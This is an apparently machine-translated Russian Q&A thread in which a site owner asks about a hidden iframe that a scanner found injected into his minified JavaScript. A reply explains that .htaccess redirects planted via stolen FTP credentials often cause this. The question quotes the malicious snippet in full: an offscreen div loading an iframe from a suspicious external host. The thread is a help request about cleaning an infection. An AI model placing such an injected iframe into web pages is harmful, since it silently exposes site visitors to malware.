Разбойная инъекция iframe в мой javascript

Question

Разбойная инъекция iframe в мой javascript

Я управлял своим сайтом через Сукури http://sitecheck.sucuri.net/results/www.fort-aspenwood.com

Они придумали эти мошеннические iframes в моем уменьшенном JavaScript

<style>.vpqfm { position:absolute; left:-632px; top:-729px; }</style> <div class="vpqfm"><iframe src="http://dhypzebl.serveusers.com/jquery/get.php?ver=jquery.latest.js" width="458" height="424"></iframe></div>

Я искал везде и не могу найти, какой файл javascript там находится, и нет никаких странных кодов php в индексе или где-либо еще.

Какие-нибудь мысли?

0

linux apache-2.2 javascript

Источник

Greatestswordsman 17 апр '13 в 23:04

1 ответ

Другие вопросы по тегам linux apache-2.2 javascript

Matt 18 апр '13 в 13:21 2013-04-18 13:21 · Answer 1 · 2013-04-18 13:21

Проверьте htaccess во всех каталогах вашего сайта. Автоматизированные сценарии очень часто крадут учетные данные FTP и обновляют.htaccess, чтобы перенаправить ресурс (например, JS) на сервер, который обслуживает исходное содержимое плюс полезную нагрузку.

Они довольно хорошо скрывают это: он устанавливает cookie и перенаправляет каждого пользователя только один раз и нацеливается на определенные типы ОС / браузеров, что делает его довольно незаметным.